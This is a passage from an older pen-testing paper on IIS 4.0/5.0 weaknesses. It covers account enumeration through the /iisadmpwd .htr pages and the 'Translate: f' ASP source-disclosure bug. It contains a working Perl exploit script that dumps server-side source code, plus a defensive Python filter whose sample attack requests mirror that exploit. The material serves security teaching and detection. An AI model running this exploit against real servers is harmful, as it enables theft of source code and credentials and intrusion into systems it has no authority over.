/iisadmpwd. This directory contains a number of .htr files. Anonymous
users are allowed to access these files; access is not restricted to the
loopback address (127.0.0.1). The following is a list of files found in the
/iisadmpwd directory, which physically maps to c:\winnt\system32\inetsrv\iisadmpwd:
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
These files are all minor variants of the same page and allow a user to
change their password via the web. They can also be used to enumerate
valid accounts by guessing.
If the user account does not exist, a message will be returned saying
"invalid domain".
If the account exists but the password is wrong, then the message will say
so.
If an IP address followed by a backslash precedes the account name
(x.x.x.x\ACCOUNTNAME), then the IIS server will contact that remote machine
over the NetBIOS session port (139) and attempt to change the user's password.
Therefore, if you do not need this service, remove the /iisadmpwd
directory. This will prevent attackers from abusing it.
=============Translate:f Bug ====================
Daniel Docekal brought this issue up on BugTraq this summer, on August 15, 2000
(www.securityfocus.com/bid/1578). The actual problem is with the WebDAV
implementation in Office 2000 and FrontPage 2000 Server Extensions.
When someone makes a request for an ASP/ASA or any other scriptable page and
adds Translate: f to the headers of the HTTP GET (headers are not part of the
URL, but part of the HTTP request), they get back the complete ASP/ASA source
code on Windows 2000 without SP1 installed.
Translate: f is a legitimate header for WebDAV and is used in WebDAV
compatible clients and in FP2000 to get the file for editing.
Simply adding Translate: f and placing a / at the end of the request (the
script below sends an encoded backslash, %5C) in an HTTP GET triggers the
security bug.
It is a Win2K bug, but because FP2000 is installed on IIS 4.0 as well, it is
also an IIS 4.0 bug.
You can use the following Perl script to exploit this.
#!/usr/bin/perl
# Trans.pl - requests a scriptable page with a trailing %5C and the
# "Translate: f" header (BID 1578) and dumps whatever the server returns.
use strict;
use warnings;
use Socket;

my ($server, $page) = @ARGV;
unless (defined $server && defined $page) {
    howto();
    exit 1;
}

my $port = 80;
# The trailing %5C (an encoded backslash) together with "Translate: f"
# is what triggers the source disclosure.
my $request = "GET /$page%5C HTTP/1.0\r\n"
            . "Host: $server\r\n"
            . "Accept: */*\r\n"
            . "Translate: f\r\n"
            . "\r\n";

my $iaddr = inet_aton($server) or die "Error: cannot resolve $server";
my $paddr = sockaddr_in($port, $iaddr);
my $proto = getprotobyname('tcp') or die "Error: $!";
socket(my $sock, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect($sock, $paddr) or die "Error: $!";
send($sock, $request, 0) or die "Can't send packet: $!";

# Write the raw response (headers plus the returned source) to a file
# named after the server.
open(my $out, '>', "$server.txt") or die "Error: $!";
print "Dumping $page to $server.txt\n";
while (my $line = <$sock>) {
    print $out $line;
}
close($out);
close($sock);

sub howto {
    print "type as follows: Trans.pl www.victim.com codetoview.asp\n\n";
}
If we save the script as Trans.pl, then we can get the ASA/ASP source code
as follows:
Trans.pl www.victim.com codetoview.asp
And there you go, you get the source code of codetoview.asp.
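As an added example (not part of the original paper), here is a small Python request filter a reverse proxy or log pipeline could run to flag both techniques described above: anonymous access to the /iisadmpwd .htr pages, and a Translate: f request with a trailing slash or encoded backslash on a scriptable page. Since Translate: f is also sent by legitimate WebDAV/FrontPage clients, only the combination is flagged. The sample requests and the hostname www.example.com are constructed.

```python
import re
from urllib.parse import unquote

SCRIPT_EXT = re.compile(r"\.(asp|asa|inc)$", re.IGNORECASE)

def parse_request(raw: bytes):
    # Split a raw HTTP/1.x request into (method, target, headers).
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    method = parts[0]
    target = parts[1] if len(parts) > 1 else "/"
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers

def classify(raw: bytes):
    """Return the names of the findings for one request (empty list if clean)."""
    _method, target, headers = parse_request(raw)
    # Decode %5C etc. so an encoded backslash is seen as a trailing backslash.
    path = unquote(target.split("?", 1)[0])
    lower = path.lower()
    findings = []
    # Anonymous reach of the /iisadmpwd .htr pages (password change, enumeration).
    if lower.startswith("/iisadmpwd/") and lower.endswith(".htr"):
        findings.append("iisadmpwd-htr-access")
    # "Translate: f" alone is legitimate (WebDAV/FrontPage editing); flag only
    # the trailing slash/backslash on a scriptable page, as in BID 1578.
    if headers.get("translate", "").lower() == "f":
        stripped = path.rstrip("\\/")
        if stripped != path and SCRIPT_EXT.search(stripped):
            findings.append("translate-f-source-disclosure")
    return findings

# Constructed sample requests (not captured traffic); the first mirrors the
# request the Perl script above sends.
SAMPLE_REQUESTS = [
    b"GET /codetoview.asp%5C HTTP/1.0\r\nHost: www.example.com\r\n"
    b"Accept: */*\r\nTranslate: f\r\n\r\n",
    b"GET /iisadmpwd/aexp2.htr HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
    b"GET /codetoview.asp HTTP/1.0\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    b"GET /index.html HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
]

def scan(requests=SAMPLE_REQUESTS):
    """Classify every request; returns one findings list per request."""
    return [classify(r) for r in requests]
```

Run `scan()` to see that only the first two constructed requests are flagged; the third carries Translate: f without the trailing backslash and is treated as an ordinary editing request.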
04- Conclusion
All the information I have given you has been widely used in the wild. What
I tried to do was simply to collect all this information together so as to
check the security of our famous IIS 4.0 and 5.0. Whenever I encounter an IIS
web server during my pen-tests, I check for these vulnerabilities, and
most of the time one of them works.
I hope that what I have written has helped you in some way. Thanks for reading
it; please continue to support me as I continue to release this sort of
paper. If you want to learn more, please check the mentioned people's web
sites for more details, and you can even write to me.
Peace in mind
Watch your servers in the wild